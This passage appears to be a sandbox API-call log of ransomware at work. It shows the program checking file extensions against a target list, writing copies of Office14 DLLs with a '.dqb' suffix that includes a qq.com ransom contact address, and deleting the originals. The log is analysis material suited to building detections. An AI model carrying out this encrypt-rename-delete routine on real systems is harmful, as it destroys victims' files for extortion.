Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0056.305] lstrlenW (lpString=".jpg") returned 4 [0056.305] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0056.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0056.305] lstrlenW (lpString=".doc") returned 4 [0056.305] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.305] lstrlenW (lpString=".docx") returned 5 [0056.305] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0056.305] lstrlenW (lpString=".pdf") returned 4 [0056.305] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.305] lstrlenW (lpString=".xls") returned 4 [0056.305] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.305] lstrlenW (lpString=".xlsx") returned 5 [0056.305] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0056.305] lstrlenW (lpString=".ppt") returned 4 [0056.305] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0056.305] lstrlenW (lpString=".zip") returned 4 [0056.305] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.305] lstrlenW (lpString=".rar") returned 4 [0056.305] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.305] lstrlenW (lpString=".bz2") returned 4 [0056.305] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.305] lstrlenW (lpString=".7z") returned 3 [0056.305] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0056.306] lstrlenW (lpString=".dbf") returned 4 [0056.306] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0056.306] lstrlenW (lpString=".1cd") returned 4 [0056.306] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.306] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0056.306] lstrlenW (lpString=".jpg") returned 4 [0056.306] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.306] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0056.306] lstrlenW (lpString="ACEODEXL.DLL") returned 12 [0056.306] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0056.307] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=15800) returned 1 [0056.307] CloseHandle (hObject=0x230) returned 1 [0056.307] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll")) returned 0x20 [0056.307] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0056.307] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0056.307] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.308] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.308] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0056.308] GetLastError () returned 0x0 [0056.308] ReadFile (in: hFile=0x230, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x3db8, lpOverlapped=0x0) returned 1 [0056.311] WriteFile (in: hFile=0x154, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0x3dc0, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0x3dc0, lpOverlapped=0x0) returned 1 [0056.314] ReadFile (in: hFile=0x230, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.314] WriteFile (in: hFile=0x154, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.314] SetEndOfFile (hFile=0x154) returned 1 [0056.314] CloseHandle (hObject=0x154) returned 1 [0056.314] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.314] SetEndOfFile (hFile=0x230) returned 1 [0056.315] CloseHandle (hObject=0x230) returned 1 [0056.315] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.315] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll")) returned 1 [0056.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0056.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0056.316] lstrlenW (lpString=".doc") returned 4 [0056.316] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.316] lstrlenW (lpString=".docx") returned 5 [0056.316] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0056.316] lstrlenW (lpString=".pdf") returned 4 [0056.316] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.316] lstrlenW (lpString=".xls") returned 4 [0056.316] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.316] lstrlenW (lpString=".xlsx") returned 5 [0056.316] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0056.316] lstrlenW (lpString=".ppt") returned 4 [0056.316] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0056.316] lstrlenW (lpString=".zip") returned 4 [0056.316] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.316] lstrlenW (lpString=".rar") returned 4 [0056.316] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.316] lstrlenW (lpString=".bz2") returned 4 [0056.316] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.316] lstrlenW (lpString=".7z") returned 3 [0056.316] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0056.316] lstrlenW (lpString=".dbf") returned 4 [0056.316] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0056.316] lstrlenW (lpString=".1cd") returned 4 [0056.316] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.316] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0056.316] lstrlenW (lpString=".jpg") returned 4 [0056.316] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0056.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0056.317] lstrlenW (lpString=".doc") returned 4 [0056.317] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.317] lstrlenW (lpString=".docx") returned 5 [0056.317] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0056.317] lstrlenW (lpString=".pdf") returned 4 [0056.317] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.317] lstrlenW (lpString=".xls") returned 4 [0056.317] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.317] lstrlenW (lpString=".xlsx") returned 5 [0056.317] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0056.317] lstrlenW (lpString=".ppt") returned 4 [0056.317] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0056.317] lstrlenW (lpString=".zip") returned 4 [0056.317] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.317] lstrlenW (lpString=".rar") returned 4 [0056.317] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.317] lstrlenW (lpString=".bz2") returned 4 [0056.317] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.317] lstrlenW (lpString=".7z") returned 3 [0056.317] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0056.317] lstrlenW (lpString=".dbf") returned 4 [0056.317] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0056.317] lstrlenW (lpString=".1cd") returned 4 [0056.317] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 68 [0056.317] lstrlenW (lpString=".jpg") returned 4 [0056.317] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.318] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0056.318] lstrlenW (lpString="ACEODTXT.DLL") returned 12 [0056.318] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0056.318] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=15800) returned 1 [0056.318] CloseHandle (hObject=0x230) returned 1 [0056.318] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll")) returned 0x20 [0056.318] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0056.318] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0056.318] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.318] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.319] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0056.320] GetLastError () returned 0x0 [0056.320] ReadFile (in: hFile=0x230, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x3db8, lpOverlapped=0x0) returned 1 [0056.321] WriteFile (in: hFile=0x154, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0x3dc0, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0x3dc0, lpOverlapped=0x0) returned 1 [0056.322] ReadFile (in: hFile=0x230, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.322] WriteFile (in: hFile=0x154, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.323] SetEndOfFile (hFile=0x154) returned 1 [0056.323] CloseHandle (hObject=0x154) returned 1 [0056.323] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.323] SetEndOfFile (hFile=0x230) returned 1 [0056.673] CloseHandle (hObject=0x230) returned 1 [0056.673] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.673] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll")) returned 1 [0057.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0057.654] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0057.655] lstrlenW (lpString=".doc") returned 4 [0057.655] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.655] lstrlenW (lpString=".docx") returned 5 [0057.655] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0057.655] lstrlenW (lpString=".pdf") returned 4 [0057.655] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.655] lstrlenW (lpString=".xls") returned 4 [0057.655] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.655] lstrlenW (lpString=".xlsx") returned 5 [0057.655] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0057.655] lstrlenW (lpString=".ppt") returned 4 [0057.655] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0057.655] lstrlenW (lpString=".zip") returned 4 [0057.655] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.655] lstrlenW (lpString=".rar") returned 4 [0057.655] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.655] lstrlenW (lpString=".bz2") returned 4 [0057.655] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.655] lstrlenW (lpString=".7z") returned 3 [0057.655] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0057.655] lstrlenW (lpString=".dbf") returned 4 [0057.655] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0057.655] lstrlenW (lpString=".1cd") returned 4 [0057.655] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0057.655] lstrlenW (lpString=".jpg") returned 4 [0057.655] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0057.655] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0057.655] lstrlenW (lpString=".doc") returned 4 [0057.656] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.656] lstrlenW (lpString=".docx") returned 5 [0057.656] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0057.656] lstrlenW (lpString=".pdf") returned 4 [0057.656] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.656] lstrlenW (lpString=".xls") returned 4 [0057.656] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.656] lstrlenW (lpString=".xlsx") returned 5 [0057.656] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0057.656] lstrlenW (lpString=".ppt") returned 4 [0057.656] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0057.656] lstrlenW (lpString=".zip") returned 4 [0057.656] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.656] lstrlenW (lpString=".rar") returned 4 [0057.656] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.656] lstrlenW (lpString=".bz2") returned 4 [0057.656] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.656] lstrlenW (lpString=".7z") returned 3 [0057.656] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0057.656] lstrlenW (lpString=".dbf") returned 4 [0057.656] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0057.656] lstrlenW (lpString=".1cd") returned 4 [0057.656] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 68 [0057.656] lstrlenW (lpString=".jpg") returned 4 [0057.656] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.656] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0057.657] lstrlenW (lpString="ACEREP.DLL") returned 10 [0057.657] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0057.789] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=691616) returned 1 [0057.789] CloseHandle (hObject=0x1a4) returned 1 [0057.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll")) returned 0x20 [0057.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0057.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0057.790] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.790] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0057.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0060.112] GetLastError () returned 0x0 [0060.112] ReadFile (in: hFile=0x1a4, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0xa8da0, lpOverlapped=0x0) returned 1 [0060.126] WriteFile (in: hFile=0x230, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xa8db0, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xa8db0, lpOverlapped=0x0) returned 1 [0060.137] ReadFile (in: hFile=0x1a4, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.137] WriteFile (in: hFile=0x230, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0060.137] SetEndOfFile (hFile=0x230) returned 1 [0060.138] CloseHandle (hObject=0x230) returned 1 [0060.138] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.138] SetEndOfFile (hFile=0x1a4) returned 1 [0060.144] CloseHandle (hObject=0x1a4) returned 1 [0060.144] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.144] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll")) returned 1 [0060.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0060.144] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0060.144] lstrlenW (lpString=".doc") returned 4 [0060.144] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0060.145] lstrlenW (lpString=".docx") returned 5 [0060.145] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0060.145] lstrlenW (lpString=".pdf") returned 4 [0060.145] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0060.145] lstrlenW (lpString=".xls") returned 4 [0060.145] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0060.145] lstrlenW (lpString=".xlsx") returned 5 [0060.145] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0060.145] lstrlenW (lpString=".ppt") returned 4 [0060.145] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0060.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0060.145] lstrlenW (lpString=".zip") returned 4 [0060.145] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0060.145] lstrlenW (lpString=".rar") returned 4 [0060.145] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0060.145] lstrlenW (lpString=".bz2") returned 4 [0060.145] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0060.145] lstrlenW (lpString=".7z") returned 3 [0060.145] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0060.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0060.145] lstrlenW (lpString=".dbf") returned 4 [0060.145] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0060.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0060.145] lstrlenW (lpString=".1cd") returned 4 [0060.145] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0060.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0060.145] lstrlenW (lpString=".jpg") returned 4 [0060.196] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0060.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0060.196] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 66 [0060.196] lstrlenW (lpString=".doc") returned 4 [0060.196] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0060.196] lstrlenW (lpString=".docx") returned 5 [0060.196] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0060.196] lstrlenW (lpString=".pdf") 